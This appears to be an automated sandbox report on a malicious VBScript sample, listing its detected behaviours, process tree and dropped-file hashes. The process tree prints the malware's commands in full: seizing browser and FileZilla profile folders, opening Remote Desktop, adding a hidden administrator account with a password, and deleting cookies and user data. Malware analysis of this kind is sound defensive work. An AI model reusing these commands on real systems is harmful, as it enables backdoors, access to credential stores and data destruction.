Analysis
-
max time kernel
22s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
19-10-2022 15:20
General
-
Target
57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
-
Size
181KB
-
MD5
91f6b90fc19be94b62bb3ec2ff60fc30
-
SHA1
ed92e88998bf8ed11994291fbdcdebf7272249fa
-
SHA256
57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
-
SHA512
ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
-
SSDEEP
1536:bTRRRRRRRRRRRRRRRRRRRRRRRVjxxxxxxxxxxxxxxxxx96df:bD6F
Score
10/10
Malware Config
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Adds policy Run key to start application 2 TTPs 4 IoCs
-
Disables RegEdit via registry modification 2 IoCs
-
Disables Task Manager via registry modification
-
Executes dropped EXE 1 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Possible privilege escalation attempt 26 IoCs
-
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 4 IoCs
-
Modifies file permissions 1 TTPs 26 IoCs
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 4 IoCs
-
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 2 IoCs
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs"1⤵
- Adds policy Run key to start application
- Disables RegEdit via registry modification
- Checks computer location settings
- Drops startup file
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uac.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mode.commode con lines=1 cols=143⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "3⤵
-
C:\Windows\system32\find.exefind /i "version 6.1."3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "3⤵
-
C:\Windows\system32\find.exefind /i "version 6.0."3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K takeown /F C:\kernel /A /R /D O & takeown /F C:\system32 /A /R /D O & CACLS C:\Kernel /E /T /C /G Admin:F & CACLS C:\system32 /E /T /C /G Admin:F & takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O & takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O & takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O & takeown /F "%userproflie%\cookies" /A /R /D O & takeown /F "C:\Windows\system32\drivers" /A /R /D O & takeown /a /f C:\Windows\System32\wscript.exe & ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F & takeown /a /f C:\Windows\System32\drivers\flpydisk.sys & ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F & EXIT2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /F C:\kernel /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F C:\system32 /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cacls.exeCACLS C:\Kernel /E /T /C /G Admin:F3⤵
-
C:\Windows\system32\cacls.exeCACLS C:\system32 /E /T /C /G Admin:F3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Skype" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "%userproflie%\cookies" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\drivers" /A /R /D O3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /a /f C:\Windows\System32\wscript.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeICACLS C:\Windows\System32\wscript.exe /Grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /a /f C:\Windows\System32\drivers\flpydisk.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type "C:\system32\blood.dat"3⤵
-
C:\Windows\system32\reg.exereg add "HKCR\VBEFile\DefaultIcon" /v "" /t "REG_SZ" /d "C:\Windows\system32\shell32.dll,1" /f3⤵
- Modifies registry class
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\kernel\*.vbe" "C:\Users\Admin\AppData\Local\Temp\"3⤵
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbe" "C:\Users\Admin\AppData\Local\Temp\"3⤵
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\Users\Admin\AppData\Local\Temp\"3⤵
-
C:\Windows\system32\attrib.exeattrib -s -h "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\system32"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\kernel"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\system32\"3⤵
-
C:\Windows\system32\xcopy.exexcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\kernel\"3⤵
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\kernel\r00t3r"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp.vbe"2⤵
- Checks computer location settings
-
C:\system32\SystemProtection.exe"C:\system32\SystemProtection.exe" /e:VBScript.Encode "C:\system32\blood.dat2⤵
- Adds policy Run key to start application
- Disables RegEdit via registry modification
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Checks whether UAC is enabled
- Modifies registry class
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uac.bat" "3⤵
-
C:\Windows\system32\mode.commode con lines=1 cols=144⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "4⤵
-
C:\Windows\system32\find.exefind /i "version 6.1."4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "4⤵
-
C:\Windows\system32\find.exefind /i "version 6.0."4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K takeown /F C:\kernel /A /R /D O & takeown /F C:\system32 /A /R /D O & CACLS C:\Kernel /E /T /C /G Admin:F & CACLS C:\system32 /E /T /C /G Admin:F & takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O & takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O & takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O & takeown /F "%userproflie%\cookies" /A /R /D O & takeown /F "C:\Windows\system32\drivers" /A /R /D O & takeown /a /f C:\Windows\System32\wscript.exe & ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F & takeown /a /f C:\Windows\System32\drivers\flpydisk.sys & ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F & EXIT3⤵
-
C:\Windows\system32\takeown.exetakeown /F C:\kernel /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F C:\system32 /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cacls.exeCACLS C:\Kernel /E /T /C /G Admin:F4⤵
-
C:\Windows\system32\cacls.exeCACLS C:\system32 /E /T /C /G Admin:F4⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\Skype" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "%userproflie%\cookies" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\drivers" /A /R /D O4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /a /f C:\Windows\System32\wscript.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeICACLS C:\Windows\System32\wscript.exe /Grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /a /f C:\Windows\System32\drivers\flpydisk.sys4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp.bat" "3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type "C:\system32\blood.dat"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp.vbe"3⤵
- Checks computer location settings
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sdf.vbs"3⤵
- Modifies visiblity of hidden/system files in Explorer
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\system32\bkr.bat" "3⤵
-
C:\Windows\system32\netsh.exenetsh firewall set service type=remotedesktop mode=enable scope=all4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\net.exenet user timalin /delete4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user timalin /delete5⤵
-
C:\Windows\system32\net.exenet user NTUSER /delete4⤵
-
C:\Windows\system32\net.exenet user /add HelpAssistant jevoussalue4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add HelpAssistant jevoussalue5⤵
-
C:\Windows\system32\net.exenet localgroup Administrators /add NTUSER4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators /add NTUSER5⤵
-
C:\Windows\system32\net.exenet localgroup Administrateurs /add NTUSER4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrateurs /add NTUSER5⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v HelpAssistant /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin" & rd/q/s Windows & rd/q/s s4t4n & rd/q/s Microsoft & rd/q/s Securities & cd/d C:\Windows\system32\drivers & ren flpydisk.sys flpydisk.sy_ & del/f/q/a C:\system\*.* & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K CD/D "C:\Users\Admin\COOKIES" & Del/f/q/a *.* & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\Application Data\Skype" & rd/s/q "C:\Users\Admin\Application Data\Skype" & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\AppData\Roaming\opera" & del/f/q opera & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\AppData\Roaming\FileZilla" & del/f/q sitemanager.xml & EXIT3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K cd/d "C:\system32" & echo done >>"C:\system32\r0k.rk" & EXIT2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user NTUSER /delete1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\sdf.vbsFilesize
327B
MD5031c3f01fd6505397cae931dbdf3bfdb
SHA1d20fdee4d60f60b957ccf742130ba56485eae8c6
SHA256b0603aa4a03646b48636653a8f950cf996ef351ff9f909b244b6b79ba15aa63a
SHA512d1c5394d41782b1a896e7a6c63e7ebf5f72c27b2bc7efb4fbe393052374e7939ad2ad3a5d4422b42547d06bb4a955b47591cd5458f3d64e9b2c5614e62132457
-
C:\Users\Admin\AppData\Local\Temp\tmp.batFilesize
1KB
MD545b08f10911ca031d2b3682a109d64d8
SHA170c69c39ee4dff16594d61e43abd0ae9cba024f4
SHA256db4b9ec1266f1088f610d217d6503aeb2b4b88dfc98b831b257bf1208add5b20
SHA5121d98beca47ca7c7cf2de6e09545bdffb608228cbd1d845a61779fb8665a987f28bd848b3363530215860eb0a6ed0078ebdd88efdf63ac140b5988a621692fb53
-
C:\Users\Admin\AppData\Local\Temp\tmp.batFilesize
1KB
MD5659ce8e39a97c207cb7b7772fac6bbbe
SHA1482911c7f725ee815c5cf1a52ff65809be1d83ff
SHA256620daa8294456838bb9323383424bf704bbadbaaa0890ce96cf04d017925e47a
SHA512eb436ee66ef4f36ecc5664dcb5268b6430cd12c085208d84b43fded8a65658c7c305a1109dfd45341c677c892553ca668596267ab916f432ec80ac7bd82dad47
-
C:\Users\Admin\AppData\Local\Temp\tmp.vbeFilesize
2KB
MD5b4725c8a0d996c389273664a63759590
SHA1219ae39177633b65c451d07fb2fe2ff739811032
SHA2568c2a55ce18955ae8db8d6640c819c3efaa1a2da1150d2a56b24189a09459bcce
SHA512b832de92b3fe9fa0c196ba07862c1222812d289f33dcaffac5832f05e908f5c51cb9490bee5ca9bb31ea3beb76f64ebb5c150ecceedb155bd39495ec88ae190f
-
C:\Users\Admin\AppData\Local\Temp\tmp.vbeFilesize
2KB
MD5b4725c8a0d996c389273664a63759590
SHA1219ae39177633b65c451d07fb2fe2ff739811032
SHA2568c2a55ce18955ae8db8d6640c819c3efaa1a2da1150d2a56b24189a09459bcce
SHA512b832de92b3fe9fa0c196ba07862c1222812d289f33dcaffac5832f05e908f5c51cb9490bee5ca9bb31ea3beb76f64ebb5c150ecceedb155bd39495ec88ae190f
-
C:\Users\Admin\AppData\Local\Temp\uac.batFilesize
1KB
MD5e2930c13dcc510ff3e677f744c13fcf2
SHA1d1bdcd06108a6bf848cf72181003ea587d1fbdb1
SHA256a4bd0e5e41f1ecfb8db11c8a217508d47b35f665bcf255bd6bc101838eb61f1e
SHA5126a63a344d8f94e800c6cacf0c3927d006e3eff380a001b32abfa2e8cbab5ea923ba52748945de9b18bc84af11f7753a2c86c880dd0c885e3fbfe392e37b43721
-
C:\Users\Admin\AppData\Local\Temp\uac.batFilesize
1KB
MD5e2930c13dcc510ff3e677f744c13fcf2
SHA1d1bdcd06108a6bf848cf72181003ea587d1fbdb1
SHA256a4bd0e5e41f1ecfb8db11c8a217508d47b35f665bcf255bd6bc101838eb61f1e
SHA5126a63a344d8f94e800c6cacf0c3927d006e3eff380a001b32abfa2e8cbab5ea923ba52748945de9b18bc84af11f7753a2c86c880dd0c885e3fbfe392e37b43721
-
C:\kernel\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbsFilesize
181KB
MD591f6b90fc19be94b62bb3ec2ff60fc30
SHA1ed92e88998bf8ed11994291fbdcdebf7272249fa
SHA25657a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
SHA512ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
-
C:\system32\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbsFilesize
181KB
MD591f6b90fc19be94b62bb3ec2ff60fc30
SHA1ed92e88998bf8ed11994291fbdcdebf7272249fa
SHA25657a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
SHA512ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
-
C:\system32\SystemProtection.exeFilesize
166KB
MD5a47cbe969ea935bdd3ab568bb126bc80
SHA115f2facfd05daf46d2c63912916bf2887cebd98a
SHA25634008e2057df8842df210246995385a0441dc1e081d60ad15bd481e062e7f100
SHA512f5c81e6dc4d916944304fc85136e1ff6dee29a21e50a54fe6280a475343eccbfe094171d62475db5f38e07898c061126158c34d48b9d8f4f57f76d49e564e3fc
-
C:\system32\SystemProtection.exeFilesize
166KB
MD5a47cbe969ea935bdd3ab568bb126bc80
SHA115f2facfd05daf46d2c63912916bf2887cebd98a
SHA25634008e2057df8842df210246995385a0441dc1e081d60ad15bd481e062e7f100
SHA512f5c81e6dc4d916944304fc85136e1ff6dee29a21e50a54fe6280a475343eccbfe094171d62475db5f38e07898c061126158c34d48b9d8f4f57f76d49e564e3fc
-
C:\system32\bkr.batFilesize
568B
MD5fc6f03cfefec6ed5e12c8de71c815751
SHA1b35cb2e194b5167322acc4ab782f6bef76409de2
SHA256ef8bd89fdc7a3e711849f318d97ab0693432daf34f7b83f18e894fa4d22e956f
SHA512ba9fbfff61de7d68e8612b9364bc8cb04117727a38f6f77912b4c4895b064f83e8b33aee51e32fef945cd13c88b2e03c5a7e21910de71fe4cd8d1a0f93fd7ad3
-
C:\system32\r0k.rkFilesize
8B
MD50438048db30e1b7f6ab1dc26028b9019
SHA1da1a0594a0587908a2369708c3c6cdcc316cfbad
SHA25659450696618a55d09cd8110b2a6191a4de8458da35f41a4112c3d408db9d6cc0
SHA512d3106527baaca4150f934d19d4da846ea37db0378077695d4f5e1f4a7488e600467a3d22b481ebfc36b94dc95a6f195a24f041702cde301b00f455418e7e776d
-
memory/208-142-0x0000000000000000-mapping.dmp
-
memory/236-141-0x0000000000000000-mapping.dmp
-
memory/400-194-0x0000000000000000-mapping.dmp
-
memory/508-197-0x0000000000000000-mapping.dmp
-
memory/744-145-0x0000000000000000-mapping.dmp
-
memory/852-165-0x0000000000000000-mapping.dmp
-
memory/960-157-0x0000000000000000-mapping.dmp
-
memory/1020-132-0x0000000000000000-mapping.dmp
-
memory/1092-191-0x0000000000000000-mapping.dmp
-
memory/1212-192-0x0000000000000000-mapping.dmp
-
memory/1284-139-0x0000000000000000-mapping.dmp
-
memory/1364-201-0x0000000000000000-mapping.dmp
-
memory/1384-156-0x0000000000000000-mapping.dmp
-
memory/1496-154-0x0000000000000000-mapping.dmp
-
memory/1668-200-0x0000000000000000-mapping.dmp
-
memory/1804-183-0x0000000000000000-mapping.dmp
-
memory/1876-151-0x0000000000000000-mapping.dmp
-
memory/1880-152-0x0000000000000000-mapping.dmp
-
memory/1892-178-0x0000000000000000-mapping.dmp
-
memory/1984-176-0x0000000000000000-mapping.dmp
-
memory/2128-137-0x0000000000000000-mapping.dmp
-
memory/2148-148-0x0000000000000000-mapping.dmp
-
memory/2152-174-0x0000000000000000-mapping.dmp
-
memory/2160-170-0x0000000000000000-mapping.dmp
-
memory/2280-181-0x0000000000000000-mapping.dmp
-
memory/2572-140-0x0000000000000000-mapping.dmp
-
memory/2648-206-0x0000000000000000-mapping.dmp
-
memory/2764-166-0x0000000000000000-mapping.dmp
-
memory/2860-202-0x0000000000000000-mapping.dmp
-
memory/3168-186-0x0000000000000000-mapping.dmp
-
memory/3180-205-0x0000000000000000-mapping.dmp
-
memory/3180-149-0x0000000000000000-mapping.dmp
-
memory/3344-180-0x0000000000000000-mapping.dmp
-
memory/3352-196-0x0000000000000000-mapping.dmp
-
memory/3456-163-0x0000000000000000-mapping.dmp
-
memory/3644-184-0x0000000000000000-mapping.dmp
-
memory/3680-147-0x0000000000000000-mapping.dmp
-
memory/3688-179-0x0000000000000000-mapping.dmp
-
memory/3720-162-0x0000000000000000-mapping.dmp
-
memory/3908-193-0x0000000000000000-mapping.dmp
-
memory/4168-134-0x0000000000000000-mapping.dmp
-
memory/4180-164-0x0000000000000000-mapping.dmp
-
memory/4224-158-0x0000000000000000-mapping.dmp
-
memory/4232-150-0x0000000000000000-mapping.dmp
-
memory/4240-155-0x0000000000000000-mapping.dmp
-
memory/4320-182-0x0000000000000000-mapping.dmp
-
memory/4360-135-0x0000000000000000-mapping.dmp
-
memory/4376-199-0x0000000000000000-mapping.dmp
-
memory/4376-136-0x0000000000000000-mapping.dmp
-
memory/4380-143-0x0000000000000000-mapping.dmp
-
memory/4400-185-0x0000000000000000-mapping.dmp
-
memory/4488-169-0x0000000000000000-mapping.dmp
-
memory/4588-146-0x0000000000000000-mapping.dmp
-
memory/4612-189-0x0000000000000000-mapping.dmp
-
memory/4776-198-0x0000000000000000-mapping.dmp
-
memory/4852-153-0x0000000000000000-mapping.dmp
-
memory/4868-159-0x0000000000000000-mapping.dmp
-
memory/4952-172-0x0000000000000000-mapping.dmp
-
memory/4960-195-0x0000000000000000-mapping.dmp
-
memory/4972-190-0x0000000000000000-mapping.dmp
-
memory/4980-138-0x0000000000000000-mapping.dmp
-
memory/5052-187-0x0000000000000000-mapping.dmp
-
memory/5104-161-0x0000000000000000-mapping.dmp
-
memory/5116-160-0x0000000000000000-mapping.dmp